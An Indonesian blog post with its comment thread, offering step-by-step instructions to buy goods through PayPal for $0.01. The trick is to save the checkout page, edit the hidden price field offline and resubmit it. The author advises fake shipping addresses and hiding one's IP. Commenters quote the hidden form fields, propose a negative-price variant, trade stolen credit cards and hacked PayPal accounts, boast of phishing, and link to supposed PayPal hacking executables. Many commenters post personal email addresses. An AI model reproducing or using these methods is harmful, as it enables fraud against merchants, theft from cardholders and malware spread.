03 March, 2009

Cara Hacking PayPal Untuk Beli Barang di Internet Hanya Dengan $ 0,01

Ini sebenarnya trik lama yang dulu pernah saya coba dan dapet buku 10 biji, cuma saya nggak bisa sebutin situsnya (sorry bro… ntar kalo ketahuan bisa mampus dipenjara…).
Kalo pengen coba ikutin langkah sederhana yang pernah saya coba:
Yang harus Anda punya:
Browser Mozilla Firefox
Account PayPal


Ini langkahnya:

1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …

Selamat Mencoba …

226 Komentar Anda:

«Oldest   ‹Older   1 – 200 of 226   Newer›   Newest»
Anonymous said...

saya sudah coba tapi kok ngak bisa :(
ajarin lebih detile dong, mas

ELLA said...

hi mas jaka,
kok klo diaplikasikan agak ribet ya
sewaktu saya save, formatnya kenapa jadi explorer?

JAKABANDA said...

Kalo di save emang kayak gitu, kalo buka lagi ya klik kanan pake' "open with" lalu klik firefox ...

Dewi Kwan Im said...

Mas Jaka ganteng,
Maksutnya "putuskan koneksi internet" itu bgmn? Kalau dari warnet maksutnya keluar dari billing?
degdegan nih mas, hehehe
soalnya paypal ku verified dan ada nominalnya

JAKABANDA said...

"Putus koneksi internet" itu ya keluar dari billing kalo di warnet, tapi kalo gagal jangan marah. Walaupun gagal toh duitnya nggak bakalan ilang. Coba aja dulu, masalahnya kalo di warnet aku belon pernah coba! Kalo sukses lapor ke aku ya, ntar tak coba di warnet...

Dewi Kwan Im said...

waaah ternyata gak bisa,mas
paypal udah canggig keamanannya
nasib!

JAKABANDA said...

Bukan nggak bisa, Anda belum beruntung...

Dewi Kwan Im said...

setelah saya klik kanan dan buka dgn firefox, paypal meminta saya utk login ulang.
Dan rincian belanja jadi hilang.
yang ada malah saya sudah dianggap membeli di website tmpt saya belanja dan billingnya masuk ke account web itu dan saya diwajibkan membayar atau kalau tidak acc saya di blacklist huhuhu :'(

Anonymous said...

Waduh... jangan-jangan Anda belanja di perusahaan Microsoft lagi, kalo itu bisa gawat non! Kalo coba-coba jangan yang mahal dulu, yang murah-murah aja trus alamat jangan pake alamat asli. Ini hacking bukan shopping...

Dewi Kwan Im said...

Waduh! Aku belanja di website yg logonya tulisannya warna warni itu.
Haha namanya jg perempuan, naluri belanjanya heboh hehe.
Dan kalau pake alamat palsu nanti barang pesenannya gak sampe ke rumah dong haha.
Makanya abang yg ganteng2 kasi tau dong
Blanja nya di mana?
email ke aku dong
gwennadmaja@yahoo.com
Thx, abang

denz said...

boleh dicoba...

budhie said...

Lebih baik mengeluarkan uang demi barang yg kita butuhkan darpada mengakali dengan triks seperti ini ... IP anda sudah akan terekam di paypal maupun di website penjual dan mereka tinggal trackback kembali ...

JAKABANDA said...

Setuju mas Budhie... itu lebih baik. Cuma kalo urusan IP bisa disembunyiin bung, baca aja "Cara sembunyikan identitas diri". Walaupun bisa jalan ini tetap saya akui HARAM hukumnya. Anggap saja ini sebuah pengetahuan ...

hasi said...

bner bisa ya??
apa cuma ngeganti hrga ny aja?

ENCYCLOPEDIA OF INTERNET AND COMPUTERS said...

ADA GAK CARA UNTUK HACK PAYPAL SUPAYA BISA DAPAT DUITNYA TANPA SOFTWARE DAN GRATIS ?...............................................

JAKABANDA said...

Ada banget. Asal tau aja nggak ada hacking yang pake sofware...

ENCYCLOPEDIA OF INTERNET AND COMPUTERS said...

KALAU TAU, TOLONG KASIH TAU DONG CARANYA ?. KE EMAIL SAYA DI the_multimedian@yahoo.co.id

ATAU WEBBLOG SAYA DI :
WWW.BOXCARGO.BLOGSPOT.COM

DAN JUGA, TOLONG KLIK LINK OREN DI BLOG ITU DONG, PENTING NIH...

Anonymous said...

boleh minta cara hacking PP nya ga bro?

email donk k bhuadambox@yahoo.com

oya, kalo cara ganti harga ni diterapin k AP bisa ga?soalnya PPnya udah limited :(

JAKABANDA said...

Dicoba aja, tapi kalo isinya PP lebih dari $1 mending jangan. Kalo urusan hack yg lain sori aku nggak bisa tunjukin, masalahnya sistem security paypal udah terupdate lebih ganas. Aku takut Indonesia ntar dibanned kasihan yg laen ntar.

ENCYCLOPEDIA OF INTERNET AND COMPUTERS said...

TOLONG DONG PAYPAL SAYA BELUM TERVERIFIKASI NIH, BISA GAK NERIMA UANG YANG DIBERI ORANG, TERUS KALAU PAKAI NO. KARTU KREDIT ORANG LAIN BISA DIVERIFIKASI DENGAN AMAN GAK ? MISALYA MAS JAKABANDA JIKA BERKENAN MeNGIRIMNYA KE EMAIL : the_multimedian@yahoo.co.id ATAU KE www.boxcargo.blogspot.com ,TOLONG DONG LAGI BUTUH VERIFIKASI PAYPAL NIH...

JAKABANDA said...

Udah tak kirim ke emailmu caranya...

andry(aa gatau) said...

mas jaka saya punya program creditcard generator bisa pake buat ferivied akun paypal ku ga? kalo daftar cc yg aku dapet di prog cc generator dapet dipake belanja di amazon ga? aman ga? nanti alamat pengiriman barangnya gimana? tar yg dateng polisi bukannya barang yg aku pesan? tolong bales ke email ku ya? (andry.design@gmail.com) btw waktu mas jaka hack buku yg 10 biji itu.. dikirim langsung ke rumah mas jaka ya?
trims sebelumnya

JAKABANDA said...

CC generator cuma buat liat nomor digit CC tapi kita gak tau siapa yg punya. Lama untuk belajar hacking, butuh waktu dan biaya. Dan yg pasti JANGAN PERNAH PAKE ALAMAT ASLI, itu saja dulu...

andry(aa gatau) said...

jadi pake alamat sapa sehingga saya bisa dapetin barangnya? tapi cc generator yg saya dapet plus nama sama alamat yg punya bahkan ada no telpon nya!

andry(aa gatau) said...

tolong email saya!!

Mochamad Agung Permana said...

awas nanti yg datang bkn barangnya tapi polisi.
haha...

Mochamad Agung Permana said...

ada yang mau CC gratis .Langsung di kirim ke alamat rumah kamu. Kalo ada yang mau e-mail aku aja di

info@axpro.co.cc

DMZ said...

ada code ini :
[quote][]input type="hidden" name="item_number" value="Store Receipt" />
[]input type="hidden" name="amount" value="79.35" />

[]input type="hidden" name="shipping" value="0.00" />
[]input type="hidden" name="tax" value="0.00" />
[]input type="hidden" name="tax_cart" value="0.00" />[/quote]

cm yg jadi masalah saya ga punya balance account :D
bisa sent ke saya 0.01 atau 0.1?? bir bisa checkout.. dr fortune39 dah ga bayarin lg :D

thx

Anonymous said...

bang jaka,aku mau bkin paypal,tapi kagak punya kartu kredit,,kalo mau bkin vcc mahal..nyampe 75 rbu,,,,klo kita pake kartu kredit orang lain bisa gak mas,kbetulan pas saya lagi di mirc bagian carding,saya dikasi ma senior2 byk bgt....semua identitasnya lengkap.Bantu saya ya bang jaka,kalo berkenan kirim ke email saya ya bang disini(bagos_forex@yahoo.co.id)
thx ya bang jaka

Benny Benzora said...

Trik Pembodohan ini !!!

Anonymous said...

Ini lagi .. nekat bener, blum pernah didatengin sama FBI ya bos dirumah ente? nglacaknya mah gampang, tinggal kontak situs yg ditipu, tanyain alamat pengirimannya kemana, besok2 rumah ente udah rame kedatengan FBI, apa gak takut mas?
Tapi kl secara pengetahuan sih boleh2 aja, cuma buat nambah2 wawasan .. yg pasti google punya security tiap hari berubah2 sekarang, udah gak gampang :)
Kontek aja mas googlenya kalo emang bisa nge hack, kasih tau mereka bahwa sistem security mereka ada kekurangan, kmungkinan mereka akan berterima kasih sekali, dan siapa tahu anda bisa jadi salah satu pegawainya, enak loh gajinya gede hehehe

Affiliasi Baru said...

Mas Jaka, aq punya account paypal blom verified, nah hari ini akses ke akun paypal saya dibatasi gara2 masukin no kartu yang salah, bisa mnta tolong ptunjuknya mas? thanx..
ai tunggu blznnya di anak.pare@gmail.com

JAKABANDA said...

Kalo dibatasi tuh nggak bakalan, tapi kalo salah masukin nomor kartu biasanya malah di BANNED dan nggak bisa ngakses lagi harus buat baru!

Rinto said...

boleh juga tuh bocorannya...tapi aku mau yang halal2 saja lah

3ndur0 said...

wah inpo yg matap..... tp hrs ekstra hati2 tu sob
biar G berurusan ama yg berwajib

w4w4 said...

sepppp bisa buat tambah pengetahuan ni ....

Pulsa Super Murah said...

salam kenal N sukses selau

dizz said...

mas makasih udah berbagi ilmunya

tapi setelah di coba kok ga bisa ya mas? apa mungking keamanannya sudah di perketat?
mas tolong dong kalo ada cara lain buat berbelanja online gratis kirim ke email saya ya :)
adis.siswanto@gmail.com

revenger said...

mas ganteng, kirimin cara hack pay pal yg lain ke email saya donk.... saya sering sakit hati dg paypal... dan saatnya balas dendam!!!! hehehe

Anonymous said...

om gug ngerti !!!
saya masih sangat awam ..
tapi saya pengen nyoba cuma buat pengetahuan aj ??ap bener bisa ato enggak..

bisa tolong kasi tau lebih detail gak ??
kalo bisa yolong kirim ke alamat email saya ya om

romantic_bleeding@yahoo.co.id

terima kasih sebelumnya

samuel said...

bagi yang mau belajar hack termasuk paypal dan apa aja silahkan kontek saya di samuelprat@gmail.com

Johan said...

bos.. saya punya beberapa no cc orang yang masih aktif dan limitnya besar. bisa bantu saya untuk mengajarkan cara2 aman untuk menggunakannya? apabila bisa tolong email saya ke (q_dals85@yahoo.com) thx

JAKABANDA said...

Minta tolong aja ama si SAMUEL tuh...

Kontes SEO Aristia Wida Rukmi said...

Tempat belanja yang paling cocok dimana?

Gunu said...

mas, tolong kasih tau donk cara menghack paypal. soalnya duit qu tiba2 abis. dan aq yakin ini juga di hack.
tolong kasih tau ya mas melalui email.
email gunuacon@gmail.com

Anonymous said...

Ya yang seperti ini yang bikin nama orang Indonesia jadi jelek, sori bukan ngeflame tapi emang kenyataannya...

Anonymous said...

dasar bego itu mah web qt sndiri

Gunu said...

mas, tolong beri info yang jelas donk..

desta.safta said...

bro..aku baru bikin pay pal tapi belum terverifikasi, minta tolong caranya bro...trims

tolong kirim via email cara2nya

Gunu said...

mas, tolong ajarin lebih jelas..

anram said...

kirim ke email saya dong caranya dan minta ym yang jual cc dong

Aden said...

bang,kirimin cara ngehack paypal dunk, ke:ianbakrie@yahoo.co.id

ditunggu ya bang,,,thanks.

JAKABANDA said...

Wah kalo itu sori, aku nggak bisa bocorin dan juga tidak dijual. Aku nggak mau bagi-bagi dosa, silahkan diuatk-atik sendiri, udah saya kasih clue-nya tuh !

Anonymous said...

Mas, bisa ga kita hack Brazzer.com isinya mantep dah cuma bikin tegang

download free said...

wah rame juga yach, g ikut2 ah sekedar baca yang mo belanja software tapi g punya uang download aja gratis hiks hiks kabur......just promosi
ato nyari uang halal ke paypal di pemulabisnis-online.blogspot.com

Anonymous said...

mas JAKA,,,,,
tolongin ane dong....
gw pengen bikin PayPal...
tapi gk punya kartu kredit,,,
bsa gk ya...????
nie email gw : zal05.trueblue@hotmail.com

JAKABANDA said...

buat account paypal nggak harus pake kartu kredit, pake VCC (Virtual Credit Card) juga bisa.
Panduannya bisa di lihat DISINI

Devilova said...

Masih belum kapok y??Kepercayaan clickbank ke Indonesia udah balik.Jangan bikin Paypal ngebanned negara kita.Tapi aku percaya g segampang itu kok, g mungkin Paypal akan tinggal diam.Cos ini menyangkut kredibilitas mereka di mata merchant.Lo mau nyari uang dengan cara gampang gabung aja disini MOBILE PARTNER.Kita dibayar per download aplikasi/ registrasi member chat yang kebanyakan gratis.Aku dah dapet $18.7 di accountku, mudah2an bulan depan bisa payout.

Bhagas_Danie said...

boz, ni buat pake tutor itu haruz pnya credit card gag?? ato paypal gag??

Repp Plzzz!!!

-bagas-

Anonymous said...

Bang, mau lah aku...
kirimin ke email ini ya : deasykartika@rocketmail.com

Please...

Anonymous said...

bg tolong kirimin ke email aq jg dunk,, cara hack paypal,, biar bs dpt duit gt,,

gionicle@ymail.com

thx..

Anonymous said...

bang..tolong kirim cara beli2 online tapi pake account/CC orang lain donk....

ciebie_bngt@yahoo.com

thanks banget Bro....

Ceritamio said...

nganti mumet aku moco...golek tambahan penghasilan we neko2 carane.. opo maneh aku anak 3. wis ngene wae dek joko... wenehi aku carane main PTC, nyolong reveral..
hehehe leno_voo26@yahoo.co.id

suwun dek

jwmbut tak bertuan said...

bah...basi...

lagian kalo cuman ngerobah source or harga, ngapain ribet2 download..
pake opera aje..
gampang,cepet,aman..
referer nye jg gak berubah...

coba lo hack punya gw cuy...
vitavee.co.tv
make paypal tuh...
yang gw jual juga barang bagus...
ayo..sape yg bisa ngehack...


nooobs....

jembut tanpa sttus said...

bah...basi...

lagian kalo cuman ngerobah source or harga, ngapain ribet2 download..
pake opera aje..
gampang,cepet,aman..
referer nye jg gak berubah...

coba lo hack punya gw cuy...
vitavee.co.tv
make paypal tuh...
yang gw jual juga barang bagus...
ayo..sape yg bisa ngehack...


nooobs....

jembut tanpa status said...

bah...basi...

lagian kalo cuman ngerobah source or harga, ngapain ribet2 download..
pake opera aje..
gampang,cepet,aman..
referer nye jg gak berubah...

coba lo hack punya gw cuy...
vitavee.co.tv
make paypal tuh...
yang gw jual juga barang bagus...
ayo..sape yg bisa ngehack...

http://vitavee.co.tv
nooobs....

info buisness said...

is very informative. The article is very professionally written. I enjoy reading this site every day.
Tips Forex
can u share with dofollow blog

Anonymous said...

<a href="http://h1.ripway.com/dimasff/paypal.txt">http://h1.ripway.com/dimasff/paypal.txt</a>

Anonymous said...

http://h1.ripway.com/dimasff/paypal.txt

Anonymous said...

kirim ke emailku donk,,, >petermsi@yahoo.com<
thx yha...

waka said...

Ribet bgt yah bang.... mending dr pada ribet2
pake hackware aja.....
Paypal Database v1.5.0.6.0 atau
Paypal Auto Changer Account v1.3

itu langung bisa rubah nominal account kita di paypal tanpa terditeksi....

ni sekedar masukan loh....

JAKABANDA said...

Boleh juga dicoba tuh software

Welcome To My World said...

bisa sih dicoba bang... cm... hrs bayar activasi codenya....
soalnya byk di dunia cyber yg jual kyk gini tp validasinya kagak ada.... alias scammer.....
gw cm ada beberapa sumber yg bisa dipercaya dalam arti yg jual hacker yg buat hackware itu sendiri.....
cm mahal....
klo buat libertyreserve ni sitenya gw kasih dah....

www.xblastz.com : ni buat beli hackware LibertyReserve

www.infernohackware.com : buat Paypal Database V1.5.0.6.0

cm mahal bgt... mereka hacker original yg buat hackware itu sendiri..... jd g mungkin palsu....

klo yg lain g tau yach....

"sekedar info"

"Hacking is not crime,
but it's a way to learn...."

JAKABANDA said...

Benar-benar share yg menarik, saya coba lihat semuanya dulu, sebab sudah 2 tahun saya berhenti dari dunia hacking. Thanks a lot for your amazing share...

Welcome To My World said...

Ur welcome bro....
say... how bout drop a line in my mail?? may be we can share something??? wakabumb@gmail.com
i'm waiting....

Regards

KC

ventus said...

wah, bahaya tuh, bisa dilacak ip adressnya, tp patut dicoba....

Welcome To My World said...

emg klo ngehack orgnya bodoh2 yach??kan bisa pake invisible browsing atau Hide IP atau IP Changer..... knp hrs pake IP sendiri??? bener g??
klo mo ngehack sekalian aja jangan tanggung2....hehehehe

Anonymous said...

mana bisalha.. bego khan, itu harga khan di tetapin diserver marketnya dodol, klo lu gnti" ampe mati juga gbkaan bisa. .klo pun iya, lu gnti hrga di databasenya dia, beeeeuhh, mau nipu ya?.. .jangan diikutin cara orang bodoh, ...

Yudhimuslim said...

Jah yo mana bisa , sampai kiamat pun cara itu nggak bakalan bisa !!

Anonymous said...

pake paypalsploit 5.2 aja buat hack paypal, video link nya disini nih :
http://www.youtube.com/watch?v=uw9o2dhIJZ8
tapi musti beli yang original

untuk yang libertyreserve pake yang vampire 3.6 ni versi terbaru, link video nya
http://www.youtube.com/watch?v=PdkTSRiY3qw

Anonymous said...

gak usah saling hina antar hacker indo lebih baik sekarang qt bersatu hack tuh rusia yang udh bobol bank indonesia

Satrio said...

Abang Jack, bole minta cara ngHack PP g?
plz kirim k
yoyo.goblog@gmail.com

Please BGT

Anonymous said...

Sok pinter luh...
kaya yang iya ajah, woii orang-orang aneh, pada sadar dong loe pade, mau ajah di boongin... jadi pinter ngga, tambah goblog iya.

This is SCAM !!!!

Anonymous said...

mas gimana caranya veriefied paypal?kirim ke email saya mas...bagbag_geol@yahoo.com

Blog Serba Guna said...
This comment has been removed by the author.
hafiezd said...

mas JAKABANDA, gimana caranya supaya paypal kita terverifikasi. soalnya paypal saya lom terverifikasi. jdnya uang kirim atau terima dibatasi mas. tolong ya mas.. ni email saya hafiezd@yahoo.com

Anonymous said...

Wew,,, bisa-bisa...
abis aq utak-atik,,,
jd aq g perlu bayar,,

wkwkwkw...

Anonymous said...

mas jakabanda, sekarang gimana caranya masuk ke account paypal yg udah di hack.trus pinnya da diganti.tolong donx mas ke oshinfans@yahoo.co.id.thx

Pemburu Dollar Group said...

wah, kalau masih 0,1 sih gak aneh. Aku punya pengalaman melakukan pembayaran pake Paypal Unverified. Lihat saja di blogku
http://arifabdulrohim.blogspot.com

Anonymous said...

om2 ma tante2 semua..
ada thread baru neh, saya improve dari thread yg di atas, cuma tinggal edit angkanya aja, misalnya $1.oo dirubah jadi -$1.00, nanti akan sertamerta pihak toko yg membayar ke account kita $1.00. enak tho? :p

Anonymous said...

woalah....kok pada ribut2 yak? tapi seru juga, cuma buat para pemula mending gak usah aja. kalo IP di hide masih bisa di trace, apalagi pak polisi,punya wewenang untuk melacak secara paksa. nek nekat pake tor lebih aman

lisin said...

verifikasi paypal kok bingung,sekarang kan bisa lewat bank lokal,bca mandiri dll panduannya http://wonosari.tk

Anonymous said...

mas Jakabanda, tolong kasih tau saya tutorial yang lebih rinci nge-hack paypal. klo mas Jaka berkenan, kirim ke email saya mas, di libertione@gmail.com
trimakasih mas jaka

inoptex said...

slmt mlm bleh minta tolong gak, paypal saya belum terverivikasi, dan mau tanya kalo pakai kartu kredit orang lain bisa gak diverivikasi dengan aman, minta bantuany tolong d emaikan y... saya masih bingunng dengan paypall. terimakasih mamo_bp@yahoo.com.sg (fb jg bisa)

Harvey prasetyo said...

masa si FBI mau ndatengin indonesia cma wat ngurusin dwt $100???padahal wat ngurus ke indo kan bisa lebih dari segitu??????????

Anonymous said...

Dari pada Gitu....
Lebih Baik Join aja di sini....

http://www.AWSurveys.com/HomeMain.cfm?RefID=h4_r33

Sekali daftar langsung dapet $27 dolar.....

Sumpah dehhhh.....!!!

asu said...

Awsurveys tuh... gw udh seminggu redeem money dr 5 hari delay yg dijanjikan mpe skarang blom dibayar juga... kyknya boong tuh pendiri Awsurveys......

Hati hati sumpahnya mas.. yg dikasih awsurveys pas daftar cuma $6. sisanya mesti survey dulu.. hehehhe

Anonymous said...

aku ada hacked PP dan email access. isi relatif, BIsa berkerja sama?

AIM: PTsusanto

Anonymous said...

mas klo duit di paypal cma nol itu bsa gk??? and klo beli barang di game itu pke cara kyak gtu bsa gk y??? tolong bales mas


thanksssssss

JAKABANDA said...

Ya gak bisa kayaknya, masalahnya kalo nol itu sama saja tidak punya account.

apsanjaya said...

TOLONG DONG PAYPAL SAYA BELUM TERVERIFIKASI NIH, BISA GAK NERIMA UANG YANG DIBERI ORANG, TERUS KALAU PAKAI NO. KARTU KREDIT ORANG LAIN BISA DIVERIFIKASI DENGAN AMAN GAK ? MISALYA MAS JAKABANDA JIKA BERKENAN MeNGIRIMNYA KE EMAIL : adput_san@rocketmail.com,TOLONG DONG LAGI BUTUH VERIFIKASI PAYPAL NIH...

JAKABANDA said...

Kalo mau verifikasi paypal klik link berikut
http://www.vcc-indonesia.com/?reg=jakabanda

ini dengan VCC, sekali beli untuk seumur hidup, buktiin aja sendiri.

sahabi said...

Bener tuh,
AWSurveys beneran scam.
Hari ni aku tunggu tug duit kagak masuk juga ke paypal.

free article said...

kalo sekarang verifikasi paypal udah bisa pake rekening bank lokal

pm saya di yedi.samsudin@yahoo.com

Anonymous said...

mas ada ga vcc yang gratis?

JAKABANDA said...

Ya gak ada lah VCC gratis, kecuali ente bikin sendiri.

Sekarang kartu ATM Mandiri kan udah bisa dibuat verifikasi di PayPal.

Anonymous said...

yang bisa cuma mandiri ya mas?

JAKABANDA said...

Setahu saya itu. Tapi jika ada kartu ATM yg setiap 3 bulan harus reverifikasi berarti itu juga bisa buat verifikasi di PayPal

ANONYMOUS ID said...

aku verifikasi pake BRI bsa. . . liat aja daftarnya. sepertinya bank lokal sudah banyak yang bsa. . .

wuis panjang bener komnnya. jadi kaya kirim comment di fb. .. :D

hack?? wah,, ini yang menyebabkan orang luar takut sama indo,, saking hebatnya orang indo dia ngehack ga pake Anonymous Proxy,, :ngakak: jadi langsung kedetek orang indo. . . jadi sekedar saran aja, kalo kita mau hacking kita pke IP luar jangan menggunakan IP lokal. kasihan juga yang lain ntar. contohnya paypal kini sudah bsa di verifikasi dengan bank lokal. namun belum bsa kirim saldo dari bank lokal ke paypal. ini saja sudah bersyukur paypal sudah memperijinkan bank lokal untuk verifikasikan akun paypal. Sekian dulu. ID indonesia.

JAKABANDA said...

Wah bagus tuh kalo udah banyak yg bisa. Aku sendiri males pake bank lokal masalahnya setiap 3 bulan harus verifikasi.
Aku pilih yg sekali udh buat seumur hidup, lebih simpel.
Bukan hanya HACK tapi semua ilmu kalo dipake gak bener ya jadinya gak bener, kalo dipake yg baik ya jadinya baik lah...

Anonymous said...

emang betul y gak bisa survey tu....

Omega said...

ngeri juga ya...

trus enaknya ngikutin yang mana dong?

Anonymous said...

masi bisa ga mas?
soalnya saya udah coba
paypalnya udah ganti 0.01
tapi pas klik pay now yg kluar malahan You cannot complete this action on the card you have selected. Please select another card.
knp yah?

Anonymous said...

kalo mau ngehack pake ip hider aja...
ahahahahahaha!!!

rio said...

Boleh...boleh...sangat mantab...btw, saya juga mau tanya soal paypal ni mas. Maklum d, namanya saya orang baru di dunia paypal. Mas, saya mau pasang logo paypal di blog saya gimana caranya ya?hehe...trus kalo cara mepopulerkan blog saya kepada para masyarakat maya gimana yang paling efektifnya?kalo gak keberatan, kirimin email seputar dunia paypal ke ario.ariofajri.fajri77@gmail.com. ya mas. Terakhir, saya juga minta saran supaya banyak costumer yang belanja di toko saya.Btw, aku pasang kode linknya si mas ke blog aku ya...tq

Anonymous said...

Mas,, Maksudnya terserah anda itu apa? apa kita harus konek lagi atau nggak? yang bner donk


aditya_nugraha@rocketmail.com

easy way to be clickers said...

makasih
http://bukanscam.blogspot.com
http://gobelan.blogspot.com
http://tegalurung.com

Rezha Pratama said...

udah ada yg berhasil blum???

HACKER LIBERTYRESERVE said...

kalo yang susah buat nge-hack mas paypal, coba ngehack LIBERTYRESERVE Aja, ada script GRATISnya tinggal dibaca aja panduannya di http://libertyreserve-hack.blogspot.com/

ijal said...

infonya bagus dan blognya juga keren.

JAKABANDA said...

Kata-2 dan isi dari blog: HACKER LIBERTYRESERVE jangan pernah dipercaya. Itu script penipuan lama.
AWAS HATI-HATI !!!

ARTIKEL BISNIS said...

saling berbagi informasi dengan sesama blogger. cek gigihoce.blogspot.com. thanks

Ahmad said...

Boleh juga infonya, lumayan nambah2 pengetahuan....

Anonymous said...

mas2 mbak2 tolong dibantu cari duwit di internet.selain program ptc.ptr.pts.dsbb, akses internet saya bisa tak ter batas.mohon beri langkah yg serious dan mudah. saya bersedia bagi hasil asalkan jelas dan yg pasti gratis tis hehheheh. maklum saya operator warnet dg 3 anak.boleh yg haram halal apalagi saya terima.balas di messiasjibril@yahoo.com

Paypal Hack said...

kok kayaknya paypal bego banget ya...

Anonymous said...

sedikit cerita aja seh,temen gw yg maen hack crack cc pp dll skrg nasibnya terkatung2 gara2 dikejar fbi.yang kasus 1 kakak adek dua2nya cewe,uda buron 3thn ga brani pulank ujung2nya duit abis minjem2 juga ma temen2.
kasus ke 2 suami istri skrg ngumpet brsama 2org anaknya.
apa sih yg dicari dr kita hidup?damai aman bahagia kan?
mulai lah dr dgn tidak merugikan org lain,mau bngsa asing kek ato alien sekalipun,mreka bkin prusahaan ato punya duit jg hasil kerja keras bkn tiba2 nge hack dpt duit yg bkn duitnya.
drpd belajar hal yg merugikan org lain yg ujung2nya hidup dlm buronan.mending belajar apa kek yg lurus2 aja sapa tau situ pada bs bkin prusahaan IT ato ISP murah terjangkau,uda membntu bnyk org,malah di doain lo jadi kaya sama yg merasa terbantu.
ga ada yg namanya shortcut utk menuju bahagia.lo bole ketawain kata2 gw skrg tp gw yakin akan terbukti omongan gw.

Anonymous said...

mas ,ksh tau cara ngehack
paypal yang baru donk?

kirimin ke email aq ya

ini email aq edocoy123@ovi.com

Reyhan Inggit Herdyar said...

nihh aku punya software hack paypal sudah saya buktikan http://reyhanzone.blogspot.com/2010/08/sofware-hack-paypal.html

Anonymous said...

Sekedar Info, Awsurvey sebenenya bisa, cuma aja paypal nya belom terverifikasi
SARAN : GIMANA KALO PARA HACKER INDONEISA BERGABUNG ?
Untuk para hacker HATI_HATI dalam bekerja hahahaha.Jangan sampe ketahuan, ntar malu2in Inodnesia


KEREN NIH BLOGNYA

Anonymous said...

Sekedar Info, Awsurvey sebenenya bisa, cuma aja paypal nya belom terverifikasi
SARAN : GIMANA KALO PARA HACKER INDONEISA BERGABUNG ?
Untuk para hacker HATI_HATI dalam bekerja hahahaha.Jangan sampe ketahuan, ntar malu2in Inodnesia


KEREN NIH BLOGNYA, MANTAB TERUS JALAN !!!!

nyai binong said...

aku kok ga bisa aja ya..? setelah ngisi data identitas, trus dia bilang, ga bisa........
bete.

Anonymous said...

info Asal Nguap......

Anonymous said...

Klu tertarik nih d coba aja software terbaru. gw sdh coba dan lumayan memuaskan. Bs menggandakan uang d account PayPal. http://www.ziddu.com/download/11969141/PayPalMoneyCracker.exe.html
Cukup install lalu restart firefox login kembali ke account PayPal km trus Klik kanan. Nanti keluar menu "Duplicated money PayPal" klik aja.Nanti akan redirect atomatis trus liat jadinya. Uang gw yang pertamanya 10 Dollar bs jadi 30 Dollar. Lumayan om. tp kelemahan software ini hanya bs d gunakan 5 Kali per satu account. jika melebihi batas maksimal bisa fatal akibatnya.account kita bs d blokir oleh system keamanan PayPal.

JAKABANDA said...

Nggak jalan pret !!

mannelijke said...

mas tolong bntu saya btuh orang sperti anda....hub sya.
randi_deck01@yahoo.com

Anonymous said...

gan tolong kirim aq caranya ya....
nie emailQ cwo.p15c35@gmail.com aq pengen beli emblem ninja saga nie....
thanks sebelumnya....

Admin Pay Pal said...

wah....mas jaka hebat....kaya jaka sembung....aku udah otak-atik di source nya,....yg tadi nya harga $120 aku ganti $340 (itung2 ngamal lah)...langsung bisa...malah prosesnya kenceng bgt...


terima kasih ya...

Efyandro said...

mas...kalo cara jadi verivied pk ATM mandirinya gimana??
jawab via email efyandro@gmail.com ya mas.. trimss...

Bruno said...

Jaka...gw punya bnyk account PP USA ne, tapi bingung cara cashoutnya..hehe, wanna share brader? chat di s0ny8l4ck@gmail.com

thanks

Mirat said...

Bagi-2 donk gan ilmunya kirim ya ke email saya soalnya 2 minggu kemaren LR gw habis semua $10 ke hack orang

kirim ya cara ngehacj LR/PP gw cuman pengen tau aja supaya duit gw bisa jerga dengan aman

nih gan email saya
sollonk@yahoo.com

Anonymous said...

mas jaka, n semuanya yg bisa bantu,
saya sering banget dikasih ma temen nih paypal sisa dr dia, yg emang sih cm plg gede 20$
tp setiap gw belanjain buat game, kaya token, atw yg lain kok yg keluar API atw masukin no CC

T_T
pemula kelas kakap nih..bantuin donk

aep said...

TOLONG DONG PAYPAL SAYA BELUM TERVERIFIKASI NIH, BISA GAK NERIMA UANG YANG DIBERI ORANG, TERUS KALAU PAKAI NO. KARTU KREDIT ORANG LAIN BISA DIVERIFIKASI DENGAN AMAN GAK ? MISALYA MAS JAKABANDA JIKA BERKENAN MeNGIRIMNYA KE EMAIL : aep.nat@gmail.com ATAU KE www.kang-ipoel.co.cc ,TOLONG DONG LAGI BUTUH VERIFIKASI PAYPAL NIH...

agus said...

gue punya software hack libertyreserve dan paypal yang terbukti bekerja,bagi yang mau
ini linknya (gra
http://www.4shared.com/file/Xk3ceUeA/TRANSFER_v21.html

JH said...

Paypal Gratis !

Kunjungi www.jambihackerlink.tk

zoel said...

hacking paypal dan libertyreserve dan terbukti bekerja 100 % :
http://www.ziddu.com/downloadlink/13448087/HACKPACK.rar

Avi said...

aduuuhhh.. Adminya ga jelas. ini kan sama aja ubah file yang ad di temp PC kita.... klo mw HTML nya berubah mesti di instal lahh HTML yang kita edit tdi...^_^

sora said...

kk kalo hack yg lainya aku mnta dang kk plin kirim ke email sya ya
Sora_zerofrom@yahoo.co.id

Anonymous said...

wah sharenya seru nih, mas jaka kirimin caranya donk ke email saya cara hack paypal : wawantopenk@yahoo.com

Anonymous said...

mas Jakabanda, tolong kasih tau saya tutorial yang lebih rinci nge-hack paypal. klo mas Jaka berkenan, kirim ke email saya mas, di yau_lim@yahoo.com. Makasi sblmnya

@nonymous said...

saya udah pernah phising paypal dan berhasil, setelah itu jadi ketagihan, awalnya cuma coba-coba hehe..tips aja, cara gampang cari account paypal yang mau kita sedot (go to ebay )



rchlcorby@gmail.com
soft-war3z.blogspot.com

Anonymous said...

tolong bung jaka
akun paypalq lum verified...
tolong emailkan cara verified gratis

Anonymous said...

tolong bang jaka
verified akun paypal
gratis

plis send to email: kutu.buku.ebook@gmail.com

Anonymous said...

bang jaka saya pndatang baru tolong kirimin cara verifikasi paypal tanpa kartu kredit donk, pliisssss banget, krim ke
a_zhe_is@yahoo.co,

sekali lagi tolong ya bang jaka, thankssss

Anonymous said...

saya cuma anak ingusan yg mau coba berjihad meng hack paypal orang atheis :D

klu boleh di share,
tolong donk kk share enggine buat tau id paypal, pass, dan jumlah duit yg ada di dalam na.

share na saya tunggu di inakpoemz@yahoo.com

Didik Yulianto said...

